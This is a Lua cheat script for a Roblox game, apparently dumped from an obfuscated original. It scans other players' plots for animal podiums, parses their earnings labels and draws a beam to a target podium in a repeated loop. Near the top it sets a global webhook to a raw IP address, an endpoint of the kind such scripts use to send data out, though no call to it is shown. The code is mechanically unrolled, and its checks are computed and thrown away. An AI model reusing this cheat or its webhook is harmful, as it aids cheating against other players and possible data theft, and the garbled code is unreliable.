-- ts file was generated at discord.gg/25ms

local genv = getgenv()
local fenv = getfenv()
local _LocalPlayer3 = game.Players.LocalPlayer

game:GetService('HttpService')

fenv.loadMainScript = function(_6, _6_2, _6_3, _6_4)
genv.webhook = 'http://144.172.110.44:5000/send'

local _call10 = game:GetService('Workspace')

game:GetService('HttpService')

local _LocalPlayer13 = game:GetService('Players').LocalPlayer

task.spawn(function(_16, _16_2, _16_3, _16_4)
    for _21, _21_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _21_2:IsA('Model')

        for _26, _26_2 in pairs(_21_2:GetDescendants())do
            _26_2:IsA('TextLabel')

            local _ = _26_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end
    for _37, _37_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _37_2:IsA('Model')

        for _42, _42_2 in pairs(_37_2:GetDescendants())do
            _42_2:IsA('TextLabel')

            local _ = _42_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _53, _53_2 in pairs(_37_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call55 = _53_2:FindFirstChild('Base', true)
            local _call63 = _call55:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call63:IsA('TextLabel')

            local _Text66 = _call63.Text

            string.find(_Text66, '%$')

            local _call74 = tostring(_Text66):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call74:match('/[sS]')
            _call74:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _call83 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call85 = Instance.new('Attachment')

    _call85.Parent = _call83
    _call85.Name = 'BeamOrigin'

    local _call87 = Instance.new('Attachment')

    _call87.Parent = _call55
    _call87.Name = 'BeamTarget'

    local _call89 = Instance.new('Beam')

    _call89.Attachment0 = _call85
    _call89.Attachment1 = _call87
    _call89.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call89.Width0 = 0.5
    _call89.Width1 = 0.5
    _call89.FaceCamera = true
    _call89.Transparency = NumberSequence.new(0.3)
    _call89.LightEmission = 1
    _call89.Parent = _call83

    for _102, _102_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _102_2:IsA('Model')

        for _107, _107_2 in pairs(_102_2:GetDescendants())do
            _107_2:IsA('TextLabel')

            local _ = _107_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _118, _118_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _118_2:IsA('Model')

        for _123, _123_2 in pairs(_118_2:GetDescendants())do
            _123_2:IsA('TextLabel')

            local _ = _123_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _134, _134_2 in pairs(_118_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call136 = _134_2:FindFirstChild('Base', true)
            local _call144 = _call136:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call144:IsA('TextLabel')

            local _Text147 = _call144.Text

            string.find(_Text147, '%$')

            local _call155 = tostring(_Text147):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call155:match('/[sS]')
            _call155:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call55 == _call136

    _call89:Destroy()

    local _call167 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call169 = Instance.new('Attachment')

    _call169.Parent = _call167
    _call169.Name = 'BeamOrigin'

    local _call171 = Instance.new('Attachment')

    _call171.Parent = _call136
    _call171.Name = 'BeamTarget'

    local _call173 = Instance.new('Beam')

    _call173.Attachment0 = _call169
    _call173.Attachment1 = _call171
    _call173.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call173.Width0 = 0.5
    _call173.Width1 = 0.5
    _call173.FaceCamera = true
    _call173.Transparency = NumberSequence.new(0.3)
    _call173.LightEmission = 1
    _call173.Parent = _call167

    for _186, _186_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _186_2:IsA('Model')

        for _191, _191_2 in pairs(_186_2:GetDescendants())do
            _191_2:IsA('TextLabel')

            local _ = _191_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _202, _202_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _202_2:IsA('Model')

        for _207, _207_2 in pairs(_202_2:GetDescendants())do
            _207_2:IsA('TextLabel')

            local _ = _207_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _218, _218_2 in pairs(_202_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call220 = _218_2:FindFirstChild('Base', true)
            local _call228 = _call220:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call228:IsA('TextLabel')

            local _Text231 = _call228.Text

            string.find(_Text231, '%$')

            local _call239 = tostring(_Text231):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call239:match('/[sS]')
            _call239:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call136 == _call220

    _call173:Destroy()

    local _call251 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call253 = Instance.new('Attachment')

    _call253.Parent = _call251
    _call253.Name = 'BeamOrigin'

    local _call255 = Instance.new('Attachment')

    _call255.Parent = _call220
    _call255.Name = 'BeamTarget'

    local _call257 = Instance.new('Beam')

    _call257.Attachment0 = _call253
    _call257.Attachment1 = _call255
    _call257.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call257.Width0 = 0.5
    _call257.Width1 = 0.5
    _call257.FaceCamera = true
    _call257.Transparency = NumberSequence.new(0.3)
    _call257.LightEmission = 1
    _call257.Parent = _call251

    for _270, _270_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _270_2:IsA('Model')

        for _275, _275_2 in pairs(_270_2:GetDescendants())do
            _275_2:IsA('TextLabel')

            local _ = _275_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _286, _286_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _286_2:IsA('Model')

        for _291, _291_2 in pairs(_286_2:GetDescendants())do
            _291_2:IsA('TextLabel')

            local _ = _291_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _302, _302_2 in pairs(_286_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call304 = _302_2:FindFirstChild('Base', true)
            local _call312 = _call304:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call312:IsA('TextLabel')

            local _Text315 = _call312.Text

            string.find(_Text315, '%$')

            local _call323 = tostring(_Text315):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call323:match('/[sS]')
            _call323:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call220 == _call304

    _call257:Destroy()

    local _call335 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call337 = Instance.new('Attachment')

    _call337.Parent = _call335
    _call337.Name = 'BeamOrigin'

    local _call339 = Instance.new('Attachment')

    _call339.Parent = _call304
    _call339.Name = 'BeamTarget'

    local _call341 = Instance.new('Beam')

    _call341.Attachment0 = _call337
    _call341.Attachment1 = _call339
    _call341.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call341.Width0 = 0.5
    _call341.Width1 = 0.5
    _call341.FaceCamera = true
    _call341.Transparency = NumberSequence.new(0.3)
    _call341.LightEmission = 1
    _call341.Parent = _call335

    for _354, _354_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _354_2:IsA('Model')

        for _359, _359_2 in pairs(_354_2:GetDescendants())do
            _359_2:IsA('TextLabel')

            local _ = _359_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _370, _370_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _370_2:IsA('Model')

        for _375, _375_2 in pairs(_370_2:GetDescendants())do
            _375_2:IsA('TextLabel')

            local _ = _375_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _386, _386_2 in pairs(_370_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call388 = _386_2:FindFirstChild('Base', true)
            local _call396 = _call388:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call396:IsA('TextLabel')

            local _Text399 = _call396.Text

            string.find(_Text399, '%$')

            local _call407 = tostring(_Text399):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call407:match('/[sS]')
            _call407:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call304 == _call388

    _call341:Destroy()

    local _call419 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call421 = Instance.new('Attachment')

    _call421.Parent = _call419
    _call421.Name = 'BeamOrigin'

    local _call423 = Instance.new('Attachment')

    _call423.Parent = _call388
    _call423.Name = 'BeamTarget'

    local _call425 = Instance.new('Beam')

    _call425.Attachment0 = _call421
    _call425.Attachment1 = _call423
    _call425.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call425.Width0 = 0.5
    _call425.Width1 = 0.5
    _call425.FaceCamera = true
    _call425.Transparency = NumberSequence.new(0.3)
    _call425.LightEmission = 1
    _call425.Parent = _call419

    for _438, _438_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _438_2:IsA('Model')

        for _443, _443_2 in pairs(_438_2:GetDescendants())do
            _443_2:IsA('TextLabel')

            local _ = _443_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _454, _454_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _454_2:IsA('Model')

        for _459, _459_2 in pairs(_454_2:GetDescendants())do
            _459_2:IsA('TextLabel')

            local _ = _459_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _470, _470_2 in pairs(_454_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call472 = _470_2:FindFirstChild('Base', true)
            local _call480 = _call472:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call480:IsA('TextLabel')

            local _Text483 = _call480.Text

            string.find(_Text483, '%$')

            local _call491 = tostring(_Text483):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call491:match('/[sS]')
            _call491:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call388 == _call472

    _call425:Destroy()

    local _call503 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call505 = Instance.new('Attachment')

    _call505.Parent = _call503
    _call505.Name = 'BeamOrigin'

    local _call507 = Instance.new('Attachment')

    _call507.Parent = _call472
    _call507.Name = 'BeamTarget'

    local _call509 = Instance.new('Beam')

    _call509.Attachment0 = _call505
    _call509.Attachment1 = _call507
    _call509.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call509.Width0 = 0.5
    _call509.Width1 = 0.5
    _call509.FaceCamera = true
    _call509.Transparency = NumberSequence.new(0.3)
    _call509.LightEmission = 1
    _call509.Parent = _call503

    for _522, _522_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _522_2:IsA('Model')

        for _527, _527_2 in pairs(_522_2:GetDescendants())do
            _527_2:IsA('TextLabel')

            local _ = _527_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _538, _538_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _538_2:IsA('Model')

        for _543, _543_2 in pairs(_538_2:GetDescendants())do
            _543_2:IsA('TextLabel')

            local _ = _543_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _554, _554_2 in pairs(_538_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call556 = _554_2:FindFirstChild('Base', true)
            local _call564 = _call556:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call564:IsA('TextLabel')

            local _Text567 = _call564.Text

            string.find(_Text567, '%$')

            local _call575 = tostring(_Text567):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call575:match('/[sS]')
            _call575:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call472 == _call556

    _call509:Destroy()

    local _call587 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call589 = Instance.new('Attachment')

    _call589.Parent = _call587
    _call589.Name = 'BeamOrigin'

    local _call591 = Instance.new('Attachment')

    _call591.Parent = _call556
    _call591.Name = 'BeamTarget'

    local _call593 = Instance.new('Beam')

    _call593.Attachment0 = _call589
    _call593.Attachment1 = _call591
    _call593.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call593.Width0 = 0.5
    _call593.Width1 = 0.5
    _call593.FaceCamera = true
    _call593.Transparency = NumberSequence.new(0.3)
    _call593.LightEmission = 1
    _call593.Parent = _call587

    for _606, _606_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _606_2:IsA('Model')

        for _611, _611_2 in pairs(_606_2:GetDescendants())do
            _611_2:IsA('TextLabel')

            local _ = _611_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _622, _622_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _622_2:IsA('Model')

        for _627, _627_2 in pairs(_622_2:GetDescendants())do
            _627_2:IsA('TextLabel')

            local _ = _627_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _638, _638_2 in pairs(_622_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call640 = _638_2:FindFirstChild('Base', true)
            local _call648 = _call640:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call648:IsA('TextLabel')

            local _Text651 = _call648.Text

            string.find(_Text651, '%$')

            local _call659 = tostring(_Text651):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call659:match('/[sS]')
            _call659:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call556 == _call640

    _call593:Destroy()

    local _call671 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call673 = Instance.new('Attachment')

    _call673.Parent = _call671
    _call673.Name = 'BeamOrigin'

    local _call675 = Instance.new('Attachment')

    _call675.Parent = _call640
    _call675.Name = 'BeamTarget'

    local _call677 = Instance.new('Beam')

    _call677.Attachment0 = _call673
    _call677.Attachment1 = _call675
    _call677.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call677.Width0 = 0.5
    _call677.Width1 = 0.5
    _call677.FaceCamera = true
    _call677.Transparency = NumberSequence.new(0.3)
    _call677.LightEmission = 1
    _call677.Parent = _call671

    for _690, _690_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _690_2:IsA('Model')

        for _695, _695_2 in pairs(_690_2:GetDescendants())do
            _695_2:IsA('TextLabel')

            local _ = _695_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _706, _706_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _706_2:IsA('Model')

        for _711, _711_2 in pairs(_706_2:GetDescendants())do
            _711_2:IsA('TextLabel')

            local _ = _711_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _722, _722_2 in pairs(_706_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call724 = _722_2:FindFirstChild('Base', true)
            local _call732 = _call724:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call732:IsA('TextLabel')

            local _Text735 = _call732.Text

            string.find(_Text735, '%$')

            local _call743 = tostring(_Text735):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call743:match('/[sS]')
            _call743:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call640 == _call724

    _call677:Destroy()

    local _call755 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call757 = Instance.new('Attachment')

    _call757.Parent = _call755
    _call757.Name = 'BeamOrigin'

    local _call759 = Instance.new('Attachment')

    _call759.Parent = _call724
    _call759.Name = 'BeamTarget'

    local _call761 = Instance.new('Beam')

    _call761.Attachment0 = _call757
    _call761.Attachment1 = _call759
    _call761.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call761.Width0 = 0.5
    _call761.Width1 = 0.5
    _call761.FaceCamera = true
    _call761.Transparency = NumberSequence.new(0.3)
    _call761.LightEmission = 1
    _call761.Parent = _call755

    for _774, _774_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _774_2:IsA('Model')

        for _779, _779_2 in pairs(_774_2:GetDescendants())do
            _779_2:IsA('TextLabel')

            local _ = _779_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _790, _790_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _790_2:IsA('Model')

        for _795, _795_2 in pairs(_790_2:GetDescendants())do
            _795_2:IsA('TextLabel')

            local _ = _795_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _806, _806_2 in pairs(_790_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call808 = _806_2:FindFirstChild('Base', true)
            local _call816 = _call808:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call816:IsA('TextLabel')

            local _Text819 = _call816.Text

            string.find(_Text819, '%$')

            local _call827 = tostring(_Text819):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call827:match('/[sS]')
            _call827:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call724 == _call808

    _call761:Destroy()

    local _call839 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call841 = Instance.new('Attachment')

    _call841.Parent = _call839
    _call841.Name = 'BeamOrigin'

    local _call843 = Instance.new('Attachment')

    _call843.Parent = _call808
    _call843.Name = 'BeamTarget'

    local _call845 = Instance.new('Beam')

    _call845.Attachment0 = _call841
    _call845.Attachment1 = _call843
    _call845.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call845.Width0 = 0.5
    _call845.Width1 = 0.5
    _call845.FaceCamera = true
    _call845.Transparency = NumberSequence.new(0.3)
    _call845.LightEmission = 1
    _call845.Parent = _call839

    for _858, _858_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _858_2:IsA('Model')

        for _863, _863_2 in pairs(_858_2:GetDescendants())do
            _863_2:IsA('TextLabel')

            local _ = _863_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _874, _874_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _874_2:IsA('Model')

        for _879, _879_2 in pairs(_874_2:GetDescendants())do
            _879_2:IsA('TextLabel')

            local _ = _879_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _890, _890_2 in pairs(_874_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call892 = _890_2:FindFirstChild('Base', true)
            local _call900 = _call892:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call900:IsA('TextLabel')

            local _Text903 = _call900.Text

            string.find(_Text903, '%$')

            local _call911 = tostring(_Text903):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call911:match('/[sS]')
            _call911:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call808 == _call892

    _call845:Destroy()

    local _call923 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call925 = Instance.new('Attachment')

    _call925.Parent = _call923
    _call925.Name = 'BeamOrigin'

    local _call927 = Instance.new('Attachment')

    _call927.Parent = _call892
    _call927.Name = 'BeamTarget'

    local _call929 = Instance.new('Beam')

    _call929.Attachment0 = _call925
    _call929.Attachment1 = _call927
    _call929.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call929.Width0 = 0.5
    _call929.Width1 = 0.5
    _call929.FaceCamera = true
    _call929.Transparency = NumberSequence.new(0.3)
    _call929.LightEmission = 1
    _call929.Parent = _call923

    for _942, _942_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _942_2:IsA('Model')

        for _947, _947_2 in pairs(_942_2:GetDescendants())do
            _947_2:IsA('TextLabel')

            local _ = _947_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _958, _958_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _958_2:IsA('Model')

        for _963, _963_2 in pairs(_958_2:GetDescendants())do
            _963_2:IsA('TextLabel')

            local _ = _963_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _974, _974_2 in pairs(_958_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call976 = _974_2:FindFirstChild('Base', true)
            local _call984 = _call976:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call984:IsA('TextLabel')

            local _Text987 = _call984.Text

            string.find(_Text987, '%$')

            local _call995 = tostring(_Text987):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call995:match('/[sS]')
            _call995:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call892 == _call976

    _call929:Destroy()

    local _call1007 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call1009 = Instance.new('Attachment')

    _call1009.Parent = _call1007
    _call1009.Name = 'BeamOrigin'

    local _call1011 = Instance.new('Attachment')

    _call1011.Parent = _call976
    _call1011.Name = 'BeamTarget'

    local _call1013 = Instance.new('Beam')

    _call1013.Attachment0 = _call1009
    _call1013.Attachment1 = _call1011
    _call1013.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call1013.Width0 = 0.5
    _call1013.Width1 = 0.5
    _call1013.FaceCamera = true
    _call1013.Transparency = NumberSequence.new(0.3)
    _call1013.LightEmission = 1
    _call1013.Parent = _call1007

    for _1026, _1026_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1026_2:IsA('Model')

        for _1031, _1031_2 in pairs(_1026_2:GetDescendants())do
            _1031_2:IsA('TextLabel')

            local _ = _1031_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _1042, _1042_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1042_2:IsA('Model')

        for _1047, _1047_2 in pairs(_1042_2:GetDescendants())do
            _1047_2:IsA('TextLabel')

            local _ = _1047_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _1058, _1058_2 in pairs(_1042_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call1060 = _1058_2:FindFirstChild('Base', true)
            local _call1068 = _call1060:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call1068:IsA('TextLabel')

            local _Text1071 = _call1068.Text

            string.find(_Text1071, '%$')

            local _call1079 = tostring(_Text1071):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call1079:match('/[sS]')
            _call1079:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call976 == _call1060

    _call1013:Destroy()

    local _call1091 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call1093 = Instance.new('Attachment')

    _call1093.Parent = _call1091
    _call1093.Name = 'BeamOrigin'

    local _call1095 = Instance.new('Attachment')

    _call1095.Parent = _call1060
    _call1095.Name = 'BeamTarget'

    local _call1097 = Instance.new('Beam')

    _call1097.Attachment0 = _call1093
    _call1097.Attachment1 = _call1095
    _call1097.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call1097.Width0 = 0.5
    _call1097.Width1 = 0.5
    _call1097.FaceCamera = true
    _call1097.Transparency = NumberSequence.new(0.3)
    _call1097.LightEmission = 1
    _call1097.Parent = _call1091

    for _1110, _1110_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1110_2:IsA('Model')

        for _1115, _1115_2 in pairs(_1110_2:GetDescendants())do
            _1115_2:IsA('TextLabel')

            local _ = _1115_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _1126, _1126_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1126_2:IsA('Model')

        for _1131, _1131_2 in pairs(_1126_2:GetDescendants())do
            _1131_2:IsA('TextLabel')

            local _ = _1131_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _1142, _1142_2 in pairs(_1126_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call1144 = _1142_2:FindFirstChild('Base', true)
            local _call1152 = _call1144:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call1152:IsA('TextLabel')

            local _Text1155 = _call1152.Text

            string.find(_Text1155, '%$')

            local _call1163 = tostring(_Text1155):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call1163:match('/[sS]')
            _call1163:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call1060 == _call1144

    _call1097:Destroy()

    local _call1175 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call1177 = Instance.new('Attachment')

    _call1177.Parent = _call1175
    _call1177.Name = 'BeamOrigin'

    local _call1179 = Instance.new('Attachment')

    _call1179.Parent = _call1144
    _call1179.Name = 'BeamTarget'

    local _call1181 = Instance.new('Beam')

    _call1181.Attachment0 = _call1177
    _call1181.Attachment1 = _call1179
    _call1181.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call1181.Width0 = 0.5
    _call1181.Width1 = 0.5
    _call1181.FaceCamera = true
    _call1181.Transparency = NumberSequence.new(0.3)
    _call1181.LightEmission = 1
    _call1181.Parent = _call1175

    for _1194, _1194_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1194_2:IsA('Model')

        for _1199, _1199_2 in pairs(_1194_2:GetDescendants())do
            _1199_2:IsA('TextLabel')

            local _ = _1199_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _1210, _1210_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1210_2:IsA('Model')

        for _1215, _1215_2 in pairs(_1210_2:GetDescendants())do
            _1215_2:IsA('TextLabel')

            local _ = _1215_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _1226, _1226_2 in pairs(_1210_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call1228 = _1226_2:FindFirstChild('Base', true)
            local _call1236 = _call1228:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call1236:IsA('TextLabel')

            local _Text1239 = _call1236.Text

            string.find(_Text1239, '%$')

            local _call1247 = tostring(_Text1239):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call1247:match('/[sS]')
            _call1247:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call1144 == _call1228

    _call1181:Destroy()

    local _call1259 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call1261 = Instance.new('Attachment')

    _call1261.Parent = _call1259
    _call1261.Name = 'BeamOrigin'

    local _call1263 = Instance.new('Attachment')

    _call1263.Parent = _call1228
    _call1263.Name = 'BeamTarget'

    local _call1265 = Instance.new('Beam')

    _call1265.Attachment0 = _call1261
    _call1265.Attachment1 = _call1263
    _call1265.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call1265.Width0 = 0.5
    _call1265.Width1 = 0.5
    _call1265.FaceCamera = true
    _call1265.Transparency = NumberSequence.new(0.3)
    _call1265.LightEmission = 1
    _call1265.Parent = _call1259

    for _1278, _1278_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1278_2:IsA('Model')

        for _1283, _1283_2 in pairs(_1278_2:GetDescendants())do
            _1283_2:IsA('TextLabel')

            local _ = _1283_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

